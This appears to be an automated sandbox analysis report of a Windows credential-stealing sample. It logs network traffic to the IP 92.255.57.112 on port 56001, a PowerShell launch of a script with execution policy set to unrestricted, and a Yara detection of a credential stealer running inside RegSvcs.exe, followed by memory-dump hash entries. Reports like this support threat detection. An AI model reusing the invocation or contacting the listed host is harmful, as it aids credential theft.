Jan 15, 2025 08:35:00.385643959 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:00.387391090 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:00.653533936 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:00.653671026 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:00.919259071 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:12.041098118 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:12.307840109 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:12.308002949 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:12.533584118 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:12.580559015 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:12.805027008 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:12.805572987 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:13.077979088 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20
Jan 15, 2025 08:35:13.078217983 CET | 49780 | 56001 | 192.168.11.20 | 92.255.57.112
Jan 15, 2025 08:35:13.350069046 CET | 56001 | 49780 | 92.255.57.112 | 192.168.11.20

                                                                  Target ID:0
                                                                  Start time:02:33:02
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
                                                                  Imagebase:0x7ff6bcfb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:02:33:02
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9280000
                                                                  File size:875'008 bytes
                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:02:33:04
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                  Imagebase:0x9d0000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HHr$PHBr
                                                                    • API String ID: 0-1376763656
                                                                    • Opcode ID: 5aa78a5be0d5d23851e5948c93db6ca11677049dc720f0b611b158461d210f39
                                                                    • Instruction ID: 03ef5c4c9278a13eeaf71e7cfe7041ea7a7ecb07e219cf669e65e4fa39ad7704
                                                                    • Opcode Fuzzy Hash: 5aa78a5be0d5d23851e5948c93db6ca11677049dc720f0b611b158461d210f39
                                                                    • Instruction Fuzzy Hash: 65D14A30A107068FD765DF79C850BAEB7F2EF88314F248A29D4059B791DB71E986CB81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @UHr
                                                                    • API String ID: 0-1452064359
                                                                    • Opcode ID: 801fe71b227583e0385c6d5919257a8131cfc3c278af45150729eac51faa8a86
                                                                    • Instruction ID: a78efa943e6262d64b60bc9dae838b628e8a8ec53af91980186c5b3099e686e8
                                                                    • Opcode Fuzzy Hash: 801fe71b227583e0385c6d5919257a8131cfc3c278af45150729eac51faa8a86
                                                                    • Instruction Fuzzy Hash: 92A12234A10218CFDB64CFA9C594BADBBF2AF89304F2495A9D505EB362DB31E941CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 4428022a2b9e20760eedb2010ff4917a4fba6d5ccfa8dff1fb5c80c5ce5672fb
                                                                    • Instruction ID: 089aeab25d80eac6f0b91d8c4c51d8d674091e0601e5f2fce337d4a249b921b8
                                                                    • Opcode Fuzzy Hash: 4428022a2b9e20760eedb2010ff4917a4fba6d5ccfa8dff1fb5c80c5ce5672fb
                                                                    • Instruction Fuzzy Hash: 62210371A013108FD786EB7994857AE3BA2EFC5310F044659D115DB3C6EB7468068BC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 3dd65b60c59eddc04ab8484f5f174ca130c98a3ed1e3f2b932c2dc7cc95d57d8
                                                                    • Instruction ID: ff245c671672c8ed5570880fe72e4735fba2385d90bb8007280acc3541803058
                                                                    • Opcode Fuzzy Hash: 3dd65b60c59eddc04ab8484f5f174ca130c98a3ed1e3f2b932c2dc7cc95d57d8
                                                                    • Instruction Fuzzy Hash: A111B270B102248FE795EF6AD4456AF7BA6EBC4710F108618D5059B384EFB06D068BC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TeBr
                                                                    • API String ID: 0-1467184053
                                                                    • Opcode ID: 8d22fc28e0f3f611cecf39f79f2c7439193e5b80ce10ffa581fc05e55ef6e7a4
                                                                    • Instruction ID: 2c98d11bdbb57df0f93443b093325aeeccaaf837cc9876abe1fb9d5352656e88
                                                                    • Opcode Fuzzy Hash: 8d22fc28e0f3f611cecf39f79f2c7439193e5b80ce10ffa581fc05e55ef6e7a4
                                                                    • Instruction Fuzzy Hash: 2611C1707102248FDB25BB64D469BEE3BB2AB88700F15066AD501AB385CEB54C42C7DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TeBr
                                                                    • API String ID: 0-1467184053
                                                                    • Opcode ID: 5f3ebe2d979cb7e5496259c7512272593a7051fa709e48c30ab67666b281be43
                                                                    • Instruction ID: cbe21fdc5ae24b18c651d2db111074bbace6affe45796f8a44294102ef45fc82
                                                                    • Opcode Fuzzy Hash: 5f3ebe2d979cb7e5496259c7512272593a7051fa709e48c30ab67666b281be43
                                                                    • Instruction Fuzzy Hash: 720180307102288FDB25BB58D429BAE76B2ABC8710F104629D501AB3C4CFB55C42C7DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: aBr
                                                                    • API String ID: 0-3022515362
                                                                    • Opcode ID: 840158f140483d2a83843ac9f023cc419e59603297140cadf8ab937d1ebee232
                                                                    • Instruction ID: c704ec78794aaa7c85ac0b711b7b432f897e2b18af34ee8b685c32002c06cfb8
                                                                    • Opcode Fuzzy Hash: 840158f140483d2a83843ac9f023cc419e59603297140cadf8ab937d1ebee232
                                                                    • Instruction Fuzzy Hash: BEF0A9307503209BE795FB69A4507AE73A2EBC4725F208A18E5069B3C4DEB06C0A87C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1e8aac12a8ed78ba294c0220fbea8e6afb7d657b8483c6ab8674512bb7732c1
                                                                    • Instruction ID: fbff39116200e291c74f71ccef9a2b5416b7a2d32d64d706038d1b27f9a7751c
                                                                    • Opcode Fuzzy Hash: d1e8aac12a8ed78ba294c0220fbea8e6afb7d657b8483c6ab8674512bb7732c1
                                                                    • Instruction Fuzzy Hash: 0641E231B002098FDB55EF68C491AAEB7F6FF89204B10C669D509DB35ADB71AC07CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 266b8ca3cdba95078537bae5a1a25d470fd11fa09ff0ae664d92e250cbbe3bc5
                                                                    • Instruction ID: 443d7485e0adb10450b832fae60a4bb91e06a9734466caad6a2b6d28bb4bf55b
                                                                    • Opcode Fuzzy Hash: 266b8ca3cdba95078537bae5a1a25d470fd11fa09ff0ae664d92e250cbbe3bc5
                                                                    • Instruction Fuzzy Hash: 0441B130B002098FDB55EF68D491AAEB7E6FF89204B10C629D5099B75ADF71AC07CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2571ec9565b407ccb6fa8b2864df65e9ec3cbff94dca10e0ef69d8c54234550a
                                                                    • Instruction ID: 9a3d61e55d05a47a94ecb0ab146ef7dfb1f534bc340893cffdcc033f2b4bc252
                                                                    • Opcode Fuzzy Hash: 2571ec9565b407ccb6fa8b2864df65e9ec3cbff94dca10e0ef69d8c54234550a
                                                                    • Instruction Fuzzy Hash: 19512034B001298FD755EF29D8A8AAE77F2FBC8304F1046A9D409DB359DA759D42CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fac75a9c121b44e67beb7438862add52bbc3aeb60286e316a1f6200b93a5c2e7
                                                                    • Instruction ID: 599d508f1d071bd0ab2f7e46934bf86111a4638c3d542471faa8f8527bb7fedd
                                                                    • Opcode Fuzzy Hash: fac75a9c121b44e67beb7438862add52bbc3aeb60286e316a1f6200b93a5c2e7
                                                                    • Instruction Fuzzy Hash: 09513034B001298FD745EF29D8A8AAE77F2FBC8300F1046A9D409DB399DA759D42CF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12099a61797380340e18b44bc44626d48bb2411f7cfea6e09a4c370438ecdfe9
                                                                    • Instruction ID: 7c18d0d07e5d23da749be4089cc9db40b9fbe0ccded89f0124bba610713cdb9a
                                                                    • Opcode Fuzzy Hash: 12099a61797380340e18b44bc44626d48bb2411f7cfea6e09a4c370438ecdfe9
                                                                    • Instruction Fuzzy Hash: 1541AE30A103468FCB51CF78C890AAEBBF5BF89204B04866AE54ACB751DB30ED45CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a90ee050dc33aa025574df0cc10f26d3c0d6b2e581f4e5ed4bbf872ac56f7b6b
                                                                    • Instruction ID: 2bd39fd0d865d5a9f8e5cb8d379eadf26a784ff92edd9bf699dc4b6c3dbe8318
                                                                    • Opcode Fuzzy Hash: a90ee050dc33aa025574df0cc10f26d3c0d6b2e581f4e5ed4bbf872ac56f7b6b
                                                                    • Instruction Fuzzy Hash: C13125317042449FD755CB68D840AABBBF6FBC9300B198AAAE449CB742DA31E841CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 019e0ee372c6b7955aad55649bc21cd4f9a0e7b6fc72ee55a6ceaa412262e804
                                                                    • Instruction ID: 89b13aa65f456708dfce052d8d3f7227f1ead650fec53c24a810e4001e50e552
                                                                    • Opcode Fuzzy Hash: 019e0ee372c6b7955aad55649bc21cd4f9a0e7b6fc72ee55a6ceaa412262e804
                                                                    • Instruction Fuzzy Hash: CD2126317163418FE703D73ADC6066A3FEBAF86A1070445AAE581CB3A2EE75DC058761
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2f3d9f5d57a2fcf797b9e0735436b1d4ca54822575eec12d6fdb6a8115b66e6
                                                                    • Instruction ID: 52c761dabcda87261424d29aeb83ab2a61d52a0dd5ef1b732f10eb340f4873fa
                                                                    • Opcode Fuzzy Hash: f2f3d9f5d57a2fcf797b9e0735436b1d4ca54822575eec12d6fdb6a8115b66e6
                                                                    • Instruction Fuzzy Hash: A311E3357122118FEB56E73EE894A2B77DBEFC4A607008529EA05CB394FE70DC008790
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbec82914bdf6102712da46655379121c961c58ce7fd0b8b8af26d70c2ed8a1b
                                                                    • Instruction ID: 05a9a10415ca373ad5d2bbb5994c2b7b8599dc6b34c339f089c0fd65718d8ed6
                                                                    • Opcode Fuzzy Hash: fbec82914bdf6102712da46655379121c961c58ce7fd0b8b8af26d70c2ed8a1b
                                                                    • Instruction Fuzzy Hash: F721AC70A1034A8FCB51CF69C490AAABBF0FF48214F04466AD449DB712D734E946CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3417dfd311703ff695ff4a8ab97ae6364387a50b58dcf20d7beb6f0b9a9eb8b4
                                                                    • Instruction ID: 9adb5e04be14e2dec8a0d9b71d3e5f228e987e1c19524f58ba751b753532052a
                                                                    • Opcode Fuzzy Hash: 3417dfd311703ff695ff4a8ab97ae6364387a50b58dcf20d7beb6f0b9a9eb8b4
                                                                    • Instruction Fuzzy Hash: C7211534610A018FD364DF19D544A9AFBE5EF88324F45CA6AD49ACBBA2C770FC45CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b465d6b5e95274465da3e89804924a09b08a05adaba791f855c27f5027bca56d
                                                                    • Instruction ID: 425d71541a33e115ac222ae4ae2782b83d58ddc338d382734b51520463e93e90
                                                                    • Opcode Fuzzy Hash: b465d6b5e95274465da3e89804924a09b08a05adaba791f855c27f5027bca56d
                                                                    • Instruction Fuzzy Hash: 7F215B74C053899FDB11CFA9C8447DEBFF4AF0A210F24845AC5A8A7391D2386948CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30707eaf599c50034ed8b0fb7ad5214c3f05a64a053b77d7324bd0faf7e597d4
                                                                    • Instruction ID: 73df2563ab550922b653a894b97bf3bfdfd2e304517e2f3eabf230d09b3290b5
                                                                    • Opcode Fuzzy Hash: 30707eaf599c50034ed8b0fb7ad5214c3f05a64a053b77d7324bd0faf7e597d4
                                                                    • Instruction Fuzzy Hash: 5811C1707042409FD360CF29D888E9BBBF9EF88318B1495A9E14ACB352C730EC46CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90bace4039e50a7cbfebd6f03eb78008d7da0bf829d86dc653a6be68efcf16fc
                                                                    • Instruction ID: a388916f50e89dcecf932b432d3cfffa705517b46c5d554d6ba3c870ded61093
                                                                    • Opcode Fuzzy Hash: 90bace4039e50a7cbfebd6f03eb78008d7da0bf829d86dc653a6be68efcf16fc
                                                                    • Instruction Fuzzy Hash: 010179357042014FD710CF69D898E7AB7E6EF89254B18446DE689CF352DB72EC06CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef57f96afdd9944b582e9419b04a7490a3deea939b5c07aa575418117a524328
                                                                    • Instruction ID: 134c54e6bff2f5fa1b3b3ce758e6af293005f9cd932ce54a037c6f30ed96c8c4
                                                                    • Opcode Fuzzy Hash: ef57f96afdd9944b582e9419b04a7490a3deea939b5c07aa575418117a524328
                                                                    • Instruction Fuzzy Hash: B80181357002018FD720DF69D898E3BB7EAEF8D265B184469E689CB351DB72EC01CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158644720837.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_120d000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d87da0337f41e05a221a5c7d6fffaabad982f00018991c844dd629ada098858d
                                                                    • Instruction ID: 7c1c44e0e813469efc80956d8e6ff15f4fe8ee5472e48de4e59102afac9fb857
                                                                    • Opcode Fuzzy Hash: d87da0337f41e05a221a5c7d6fffaabad982f00018991c844dd629ada098858d
                                                                    • Instruction Fuzzy Hash: C001F7314163499BE7124AD6C8C4766BF98EF41234F18821AEE0C5A2C7D3799A41CAB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0882a792af04aa7571c564ca866f455d09ad9a0df631e11e9d1f411715553d2b
                                                                    • Instruction ID: f0f5f70fc788710daa56bba89d667234c06ac89ee69093df0a0a485492146f76
                                                                    • Opcode Fuzzy Hash: 0882a792af04aa7571c564ca866f455d09ad9a0df631e11e9d1f411715553d2b
                                                                    • Instruction Fuzzy Hash: 3111F2B5D003499FDB10DFAAC484BDEBBF4AB48314F20841AC529A7340D379A944CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158644720837.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_120d000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 407ec782b6caecc14f9238c9f4256f89c4e6fc164f88a519f2d2bb6251541046
                                                                    • Instruction ID: 8f0d755737e003a7232c3e4faefbd6addac96eca2ee7bf273ddbe38158b38499
                                                                    • Opcode Fuzzy Hash: 407ec782b6caecc14f9238c9f4256f89c4e6fc164f88a519f2d2bb6251541046
                                                                    • Instruction Fuzzy Hash: A3F0C271405344AEE7118E4ACCC4B62FF98EF50734F28C15AEE084B283C2799944CAB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e68be44d37edba9f238b613a874dafde5efedbfc4613609ea9578c5ba62a6e7
                                                                    • Instruction ID: a24abbb5ed3b0ff5afcefa3546c08684472cd2502a8d05be02548c1a0da3fbe5
                                                                    • Opcode Fuzzy Hash: 6e68be44d37edba9f238b613a874dafde5efedbfc4613609ea9578c5ba62a6e7
                                                                    • Instruction Fuzzy Hash: A8F0A7B1A0C2405BD345CA18CC52E5ABBA1AFD5204F18C85ED544C73A2D623DC07C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dd883eedcaaaae2ff0eea062de8b475f0112d5d6a65a29aa27bc7f5a1615f1b
                                                                    • Instruction ID: 2411d826a2c58f5f59575417a1051a3b5860564381abf8faec5aae1aacbabc9a
                                                                    • Opcode Fuzzy Hash: 9dd883eedcaaaae2ff0eea062de8b475f0112d5d6a65a29aa27bc7f5a1615f1b
                                                                    • Instruction Fuzzy Hash: 6AE0DF30A16389EFC702EFB0D80156D7BF8FB06205B2041EAD408CB311EB315E05CB41
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3845a30849b7158478dcfa4a13880a3c2f2b149f0cf086507893bf9bec275fbb
                                                                    • Instruction ID: 959100f05a5df25cc817dc307bb36ef2e5597d94fec2e1f91ecb987d57d8b9c9
                                                                    • Opcode Fuzzy Hash: 3845a30849b7158478dcfa4a13880a3c2f2b149f0cf086507893bf9bec275fbb
                                                                    • Instruction Fuzzy Hash: 8BE0863590A389EFC702DFB89900449BFF59E4310071502EFD5C4CB353E9315A19DBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03160d7d908ede3cba8b8409b93ba6ae2ae3e662520c934e8ef4a0a1686f2a14
                                                                    • Instruction ID: b2b3bd473953b69973951ebbc515d50b85f6b4bbc6994edd19aeffbc62d3f570
                                                                    • Opcode Fuzzy Hash: 03160d7d908ede3cba8b8409b93ba6ae2ae3e662520c934e8ef4a0a1686f2a14
                                                                    • Instruction Fuzzy Hash: 07E0C2B690C3400FD381DA50D852AA9BBB1EF91200F0D989AE480E7347F651CC07CF20
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e981efc403b20be0b416d94b8a31306f0126edd8be4a1c2111860e7c3bfeb2d2
                                                                    • Instruction ID: cee9d5346c1e3a884dda18a7b970d8a23a5575ce53ad7db86371aa8a6e89f096
                                                                    • Opcode Fuzzy Hash: e981efc403b20be0b416d94b8a31306f0126edd8be4a1c2111860e7c3bfeb2d2
                                                                    • Instruction Fuzzy Hash: 43E08C71218380AFD34ACA888C048EABB75EB8A21071A889BE49087353D6629C07C761
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42af8963fd9ed23af68985c3396361db4ad1f5fda7ba366acf4a77f6b2d4ab31
                                                                    • Instruction ID: 60fc423b436365c855d310001449c042d5191fc8be230ed55013566401128b59
                                                                    • Opcode Fuzzy Hash: 42af8963fd9ed23af68985c3396361db4ad1f5fda7ba366acf4a77f6b2d4ab31
                                                                    • Instruction Fuzzy Hash: BFE0723160C1008BC300FFA8DC40DDAB3B1EF82300F0484AEE84607202E730A947C7B1
                                                                    Memory Dump Source
